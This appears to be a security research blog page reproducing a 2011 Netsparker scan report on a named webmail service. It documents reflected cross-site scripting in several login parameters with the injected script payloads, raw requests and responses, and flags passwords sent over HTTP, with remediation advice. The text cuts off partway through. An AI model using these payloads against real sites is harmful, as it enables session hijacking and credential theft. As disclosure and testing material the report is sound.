astromail.gis.net, XSS, DORK, GHDB, Reflected Cross Site Scripting
Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.
XSS.CX Home |
XSS.CX Research Blog
Loading
Netsparker - Scan Report Summary
TARGET URL
http://astromail.gis.net/cgi-bin/astromail.cg...
SCAN DATE
4/21/2011 6:53:00 PM
REPORT DATE
4/21/2011 8:49:15 PM
SCAN DURATION
00:52:35
Total Requests
7892
Average Speed
2.50
req/sec.
18
identified
15
confirmed
0
critical
3
informational
GHDB, DORK Tests
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
VULNERABILITY SUMMARY
Vulnerability Summary
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
Type
Value
page
GET
'"--></style></script><script>alert(0x000096)</script>
Request
GET /cgi-bin/astromail.cgi?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000096)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 23:53:55 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net,webmail_cookie=works; expires="Sun, 22-May-2011 23:53:55 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<html><head> <title>TPL Error</title></head><body><p><h1>Unexpected Error Occurred</h1></p><p>Failed to Locate Template {/var/spool/webmail/templates/'"--></style></script><script>netsparker(0x000096)</script>.tpl}Failed to Locate Template {/var/spool/webmail/templates/'"--></style></script><script>netsparker(0x000096)</script>.tpl}Failed to Locate Template {/var/spool/webmail/templates/'"--></style></script><script>netsparker(0x000096)</error.tpl}Expected Template ini Setting Incorrect</p></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
email
POST
netsparker@example.com
force_connection
POST
true
frames
POST
true
host
POST
'"--></style></script><script>alert(0x000138)</script>
pass
POST
3
quick_login
POST
3
set_cookie
POST
ON
tcode
POST
7-16881072524
user
POST
3
user_or_email
POST
netsparker@example.com
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 23:59:48 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> ''"--></style></script><script>netsparker(0x000138)</script>' Host is not allowed - Admin must add or modify valid_host setting in webmail.ini<br>Failed connection to Mail Server<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
email
POST
netsparker@example.com
force_connection
POST
true
frames
POST
true
host
POST
pop.gis.net
pass
POST
3
quick_login
POST
3
set_cookie
POST
ON
tcode
POST
7-16881072524
user
POST
'"--></style></script><script>alert(0x000175)</script>
user_or_email
POST
netsparker@example.com
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:04:34 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> Username/Password Failure (-ERR '"--></style></script><script>netsparker(0x000175)</script> Incorrect username or password)<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
'"--></style></script><script>alert(0x0001A3)</script>
host
POST
pop.gis.net
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:07:33 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> Username/Password Failure (-ERR '"--></style></script><script>netsparker(0x0001a3)</script> Incorrect username or password)<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
3
host
POST
'"--></style></script><script>alert(0x0001A4)</script>
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:07:40 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> ''"--></style></script><script>netsparker(0x0001A4)</script>' Host is not allowed - Admin must add or modify valid_host setting in webmail.ini<br>Failed connection to Mail Server<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
'"--></style></script><script>alert(0x00020E)</script>
host
POST
pop.gis.net
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
quick_login.x
POST
0
quick_login.y
POST
0
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:16:21 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> Username/Password Failure (-ERR '"--></style></script><script>netsparker(0x00020e)</script> Incorrect username or password)<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
3
host
POST
'"--></style></script><script>alert(0x00020F)</script>
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
quick_login.x
POST
0
quick_login.y
POST
0
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:16:28 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> ''"--></style></script><script>netsparker(0x00020F)</script>' Host is not allowed - Admin must add or modify valid_host setting in webmail.ini<br>Failed connection to Mail Server<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
'"--></style></script><script>alert(0x000297)</script>
host
POST
pop.gis.net
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
set_cookie
POST
ON
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:24:50 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> Username/Password Failure (-ERR '"--></style></script><script>netsparker(0x000297)</script> Incorrect username or password)<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
3
host
POST
'"--></style></script><script>alert(0x000298)</script>
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
set_cookie
POST
ON
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 00:24:57 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> ''"--></style></script><script>netsparker(0x000298)</script>' Host is not allowed - Admin must add or modify valid_host setting in webmail.ini<br>Failed connection to Mail Server<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
'"--></style></script><script>alert(0x000311)</script>
host
POST
pop.gis.net
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
set_cookie
POST
ON
quick_login.x
POST
0
quick_login.y
POST
0
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 01:11:01 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> Username/Password Failure (-ERR '"--></style></script><script>netsparker(0x000311)</script> Incorrect username or password)<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Parameters
Parameter
Type
Value
cmd
POST
quick_login
tcode
POST
7-16881072524
user
POST
3
host
POST
'"--></style></script><script>alert(0x000312)</script>
force_connection
POST
true
frames
POST
true
email
POST
netsparker@example.com
user_or_email
POST
netsparker@example.com
pass
POST
3
set_cookie
POST
ON
quick_login.x
POST
0
quick_login.y
POST
0
Request
POST /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 01:11:07 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>An error has occured</title></head><body background="" bgcolor="#FFFFFF"> <h3> An error has occured</h3><center> <table border="1"> <tr> <td align="center"><img src="/images/attention.gif" alt="Attention" /></td> <td bgcolor="ffffff"> ''"--></style></script><script>netsparker(0x000312)</script>' Host is not allowed - Admin must add or modify valid_host setting in webmail.ini<br>Failed connection to Mail Server<br> </td> </tr> <tr> <td></td> <td align="center"> <script type="text/javascript"> <!-- if(window.opener){ if(window.opener.parent.framelist){ document.write('<a href="javascript:window.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } else{ document.write('<a href="javascript:window.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.close();">Login</a>'); } } else if(window.parent){ if(window.parent.opener){ if(window.parent.opener.parent.framelist){ document.write('<a href="javascript:window.parent.opener.parent.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } else{ document.write('<a href="javascript:window.parent.opener.parent.location.replace(\'/cgi-bin/astromail.cgi?cmd=abc\');window.parent.close();">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } } else{ document.write('<a target="_top" href="/cgi-bin/astromail.cgi?cmd=abc">Login</a>'); } //--> </script> </td> </tr> </table> </center><hr /><font face="Arial" size="-1">Copyright 2003-2008, Galaxy Internet Services, <b>617-558-0900</b></font></body></html>
Password Transmitted Over HTTP
Password Transmitted Over HTTP
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
See the remedy for solution.
Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
/cgi-bin/astromail.cgi
Request
GET /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 23:53:42 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net,webmail_cookie=works; expires="Sun, 22-May-2011 23:53:42 GMT"; domain=astromail.gis.net
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<html><head><!--ns: ie:6.0--><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Pragma" CONTENT="no-cache" /><meta http-equiv="cache-control" CONTENT="no-cache" /><meta http-equiv="Expires" CONTENT="-1" /><style type="text/css"><!--body{ font: 9pt "Arial"; color: black;}td{ font: 9pt "Arial"; color: black;}td.webmail{ font: 24pt "Arial"; color: black; font-weight: "bold";}td.login{ font: 15pt "Arial"; color: black; font-weight: "bold";}td.title{ font: 13pt "Arial"; color: black; font-weight: "bold";}th{ font: 9pt "Arial"; color: black;}A{ font: 9pt "Arial"; color: black;}//--></style><script type="text/javascript"><!--function fixLogin(){ var user_or_email = document.loginform.user_or_email.value; var at = user_or_email.indexOf("@"); if (at > 0) { var domain = new String(user_or_email.substring(at+1)); domain = domain.toLowerCase(); if (domain == "gis.net") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "pop.gis.net"; return true; } else if (domain == "mail2.gis.net") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "mail2.gis.net"; return true; } else if (domain == "eecprovider.org") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "pop.eec.gis.net"; return true; } } document.loginform.user.value = user_or_email; document.loginform.host.value = "pop.gis.net"; return true;}function popupPage() { var windowprops = "height=475,width=425,location=no,menubar=yes,toolbars=no,resizable=no"; window.open("http://www.gis.net/dialup/loading.html", "PopupHelp", windowprops);}//--></script><title>AstroMail - Galaxy Internet Services</title></head><body onLoad="window.focus();document.loginform.user_or_email.focus();"><form action="/cgi-bin/astromail.cgi" method="post" name="loginform" onSubmit="fixLogin();"><input type="hidden" name="cmd" value="quick_login" /><input type="hidden" name="tcode" value="7-16881072524" /><input type="hidden" name="user" value="" /><input type="hidden" name="host" value="pop.gis.net" /><input type="hidden" name="force_connection" value="true" /><input type="hidden" name="frames" value="true" /><input type="hidden" name="email" value="" /><center><table cellpadding=0 cellspacing=0 border=0 width=492><td bgcolor="#EEEEDD"><img src="/images/toplogo.jpg" /><table cellpadding=10 cellspacing=0 border=0 width=492><tr> <td align="center" colspan="2" class="title"><font size="3" style="font-weight:bold;">Welcome to AstroMail!</font></td></tr><tr> <td colspan="2" class="title"><font size="3" style="font-weight:bold;">Members:</font></td></tr><tr> <td align="center" colspan="2"> <table width="330"> <tr> <td nowrap="true"><font style="font-weight:bold;">Username / Email: </font></td> <td nowrap="true"><input type="text" size="30" maxlength="255" name="user_or_email" tabindex="1" value="" /></td> <td align="center" rowspan="2"> <input type="image" src="/images/login.gif" alt="Login" name="quick_login" tabindex="4" /><br /> <font style="font-weight:bold;">Login</font> </td> </tr> <tr> <td nowrap="true"><font style="font-weight:bold;">Password: </font></td> <td nowrap="true"><input type="password" size="30" maxlength="255" name="pass" tabindex="2" value="" /></td> </tr> <tr> <td nowrap="true" colspan="2"> <font style="font-weight:bold;">Remember Login: </font> <input type="checkbox" name="set_cookie" value="ON" /> </td> </tr> </table> </td></tr> <tr> <td colspan="2" class="title"><font size="3" style="font-weight:bold;">Help:</font></td></tr><tr> <td colspan="2" 